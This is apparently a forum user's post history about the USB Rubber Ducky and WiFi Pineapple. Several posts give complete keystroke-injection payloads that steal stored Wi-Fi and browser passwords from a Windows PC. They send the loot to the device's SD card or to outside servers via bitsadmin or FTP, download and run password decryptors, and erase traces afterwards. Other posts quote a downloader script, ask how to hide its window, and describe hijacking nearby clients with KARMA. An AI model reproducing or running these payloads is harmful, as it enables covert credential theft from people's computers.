crashie

Sadly, a lot of stuff just "die" from time to time.. people lose interest.. But I'm at least trying to do my part and deliver some payloads to the community.. working on some cool stuff regarding password dumping without any admin privileges. But it will take some time since I am looking into some flaws in Windows 7 currently.. Don't know if there are others still around working on new payloads.. Some seems to still be here.. I myself just got my ducky like a week ago.. :P Wonder if we can get this forum really active by releasing a 0day exploit in the form of a payload to the ducky.. ;) Take care now.. /crashie

I will try that when I get back home and can use a PC, since my mac has another layout :P But I'll post the results. Thanks for all the other comments to. /crashie

Here we hold SHIFT and press the key which has the UMLAUT (¨) symbol and caret (^) and after that a SPACE to get the ^. So there are three buttons involved to get the symbol in windows. Here's a pic of the layout: http://upload.wikimedia.org/wikipedia/en/c/cf/Keyboard_Layout_Swedish.png If you press the ALT and the same button you get a TILDE.

Hi, wonder if anyone here can help solving a small problem regarding the nordic keyboard layout's in windows. Trying to get the correct reference to the symbol "^" (caret) but can't figure it out. The reference in the sv.properties, no.properties, dk.properties are incorrect. Have tried this: //ASCII_5E = CIRCUMFLEX_BITS + KEY_SPACE, MODIFIERKEY_SHIFT But it won't work.. still giving errors when the caret symbol is included in a script. Any help appreciated. /crashie

Thanks! I've been playing around all weekend and are getting the hang of things now :P I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course, it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there but some get flagged by the AV's like nirsofts and others are to heavy in size because of a GUI.. And btw, take a look at the bitsadmin payload.. sending files over HTTP :P Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P /crashie

This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky. Requirement: This one is to be used with Twin Duck firmware. DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d DELAY 500 ENTER DELAY 300 STRING netsh wlan export profile folder=%myd%\ key=clear ENTER DELAY 500 STRING exit ENTER

Just made this little script/payload that exports the Wi-Fi passwords on Windows Vista/7/8 and combines and renames it to wipass.xml and then uploads via HTTP to a webserver running IIS with BITS extension. This way there is no need to worry for UAC or stuff like that.. and since it's HTTP upload the firewall won't ask questions.. :P Here's the script/payload: DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear ENTER DELAY 200 STRING copy /b %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml STRING bitsadmin /transfer uloaded /upload /priority HIGH http://server.com/upload/wipass.xml %USERPROFILE%\wipass.xml ENTER DELAY 2200 STRING erase /Q %USERPROFILE%\*.xml ENTER DELAY 200 STRING exit ENTER

Here's one contribution to add to the payload repository on the wiki. Feel free to use it. There is one thing to have in mind though, it only works with IIS servers which have enabled BITS transfers to a "upload" folder. But the code needed is tiny once you have set up a server to receive the file/files. Below is how I use it to download a Wi-Fi password decryptor which decrypts all the stored passwords on the target computer to a .htm file together with SSID. Then it uploads the .htm to my webserver and after that it deletes the password decryptor and the .htm file and exits. Bitsadmin is deprecated in Windows 7 but still there and running per default :) More commonly used in Vista and XP SP2. You can of course use it for other tools or executables that dumps stuff to another file.. :) Requirement: An IIS server with BITS server extension enabled and configured. It's easy to set up, just drop me a PM and I'll assist you. REM ### BITSADMIN Download/Execute & Upload payload with file erase ### --- By crashie --- GUI R DELAY 200 STRING cmd ENTER DELAY 600 STRING bitsadmin /transfer myjob /download /priority high http://server.com/upload/wifipass.dba %TEMP%\wifi.exe &start %TEMP%\wifi.exe wipass.htm ENTER DELAY 3000 ENTER STRING bitsadmin /transfer uloaded /upload /priority high http://server.com/upload/wipass.htm %USERPROFILE%\wipass.htm ENTER DELAY 3000 STRING erase /Q %TEMP%\wifi.exe %UserProfile%\wipass.htm ENTER DELAY 50 STRING exit ENTER

Have put together different parts to get what I needed and it works. It may need some fine-tuning but it's the first payload I've ran successfully that really does something :P (got my rubber ducky yesterday). What it does is that it downloads a browser password decryptor and executes it and saves the passwords to a .htm file and then it uploads the .htm to an FTP and when the upload is finished it quits and delete the executable together with the .htm file containing all the passwords. This is how it looks like, and yeah.. don't laugh :P It's my first attempt and I think you can guess what I will be doing this weekend :P I will try to make it upload the passwords to a server with PHP instead. But here's the script ready to run, well.. at least it works :P Any attempts to help with the fine tuning is welcome :) But I do as always.. learning by doing ;) GUI R DELAY 200 STRING cmd ENTER DELAY 50 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://websitecom/file.dba','%TEMP%\pass.exe'); Start-Process "%TEMP%\pass.exe pass.htm" DELAY 50 ENTER DELAY 2000 STRING cd %USERPROFILE% ENTER DELAY 50 STRING ftp ENTER DELAY 50 STRING o ENTER DELAY 50 STRING ftp.website.com 21 ENTER DELAY 50 STRING username ENTER DELAY 50 STRING password ENTER DELAY 100 STRING put pass.htm ENTER DELAY 1000 STRING bye ENTER STRING erase /Q %TEMP%\pass.exe %UserProfile%\pass.htm ENTER DELAY 500 STRING exit ENTER

Problem solved! And yeah, stupid me having CAPS on :P But that's how you learn, by making all the mistakes ;) Thanks!

Hey, Have some issues with the ducky.. or most probably it's something I do wrong.. When I try to run below script: REM Description: Change the users home page - simple but effective REM Author: PrikleyPaw REM ---- Command Prompt Admin DuckSauce v.02 ---- ESCAPE CONTROL ESCAPE STRING cmd /T:01 MENU STRING a DELAY 400 ALT Y DELAY 200 STRING @echo off && mode con:COLS=15 LINES=1 && title Installing Drivers ENTER DELAY 250 REM Change www.yahoo.com to what ever you want their home page to be... REM Good to change to compromised page (beef, set, metasploit). STRING cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d www.yahoo.com /f STRING exit ENTER I get this error message: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>CMD /C reg add "hkey_current_user\sOFTWARE\mICROSOFT\iNTERNET eXPLORER\mAIN" /V "sTART pAGE" /D WWW.YAHOO.COM /FEXIT ERROR: Invalid syntax. Type "REG ADD /?" for usage. C:\Windows\system32>

Hi and thanks for your response! So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows? I tried the RunEXE script (and have installed twin duck firmware (the special version 1 that runs the payload when CAPS is pressed) but when I did that it just opened up hell of a lot of windows and the registry and some programs and did not execute my file.. So I don't know what went wrong there.. Appreciate any help given. And sorry for being such a newbie :P But one have to start somewhere ;) /crashie

Hi, I'm new to the ducky, just got it today :P I am trying to get it to download an executable file from a http and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible during the whole time until it's finished doing what it should do, download and execute. Isn't there a way to do this in the background so that it doesn't get noticed? Thanks in advance! / Crashie Btw, this is the script I'm talking about: ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs <INSERT URL HERE> ENTER STRING <INSERT EXE FILENAME HERE> ENTER STRING exit ENTER

Well, as some of you already have said. If you work enough on it and read enough you WILL get it to work. Mine is working great now so all i solved! :P For any n00b out there who needs help with setting up their pineapple just let me know and I'll help out. Cheers!

I've been trying everything on my Mac and read through the forums but can't get it right. Ne1 here who can help me out? When I get it running I promise to write a step by step instruction so that you never have to do this again ;) I'm pretty stuck where I am now, been trying for hours but can't get it straight.. even bought a crossover cable but that doesn't help. I can connect to the unit itself with no problems. And I see it starting up some networks that I've used before on my iPhone that I try to use as a client to hijack it. But the iPhone never connects to the Internet and I have activated the ICS in osx lion from the wifi to the USB Ethernet adapter. When I start up the unit and have it plugged in to my mac the Internet connection drops on the mac (I am connected to a wireless router through the wifi-card on the mac). After a while the wireless adapter on the mac changes IP to the Pineapples IP. My connection is setup this way: Macbook Air ---> connected to WiFi Router and ICS is enabled from WiFi to USB Ethernet adapter. Pineapple ----> connected to my Macbook Airs USB Ethernet port. Macbook Air USB Ethernet Adapter = IP:192.168.2.1 Pineapple = IP:192.168.2.2, Gateway set to 192.168.2.1, DNS set to 192.168.2.1 Anyone that can help me with what I am doing wrong? Cheers!

Ok guys, I might not be the most clever here.. that's why I ask you for help. I've bought the Wifi Pineapple v2 at Defcon today and have brought it back home now. I have a Macbook air running OSX Lion. If I connect the Pineapple to my mac's LAN port I can access it and start stuff like KARMA. Now, how do I get my Macbook air's internet connection forwarded to the Pineapple? So others that are nearby connects to my pineapple and access internet through it? I've read many of the internet connection sharing threads but they don't make me any smarter. Do I need another Wi-Fi dongle to be able to get the clients who connect to the Pineapple an Internet connection? Or can they just use the one my Macbook Air uses? Like sharing it to the pineapple? I haven't ssh'd into the pineapple, it configured as when I bought it. I also have windows 7 running in vmware on this Macbook Air if that is easier to work with. Thanks in advance from a n00b who needs some first time help to get running. Cheers!

Ok guys, I might not be the most clever here.. that's why I ask you for help. I've bought the Wifi Pineapple v2 at Defcon today and have brought it back home now. I have a Macbook air running OSX Lion. If I connect the Pineapple to my mac's LAN port I can access it and start stuff like KARMA. Now, how do I get my Macbook air's internet connection forwarded to the Pineapple? So others that are nearby connects to my pineapple and access internet through it? I've read many of the internet connection sharing threads but they don't make me any smarter. Do I need another Wi-Fi dongle to be able to get the clients who connect to the Pineapple an Internet connection? Or can they just use the one my Macbook Air uses? Like sharing it to the pineapple? I haven't ssh'd into the pineapple, it configured as when I bought it. I also have windows 7 running in vmware on this Macbook Air if that is easier to work with. Thanks in advance from a n00b who needs some first time help to get running. Cheers!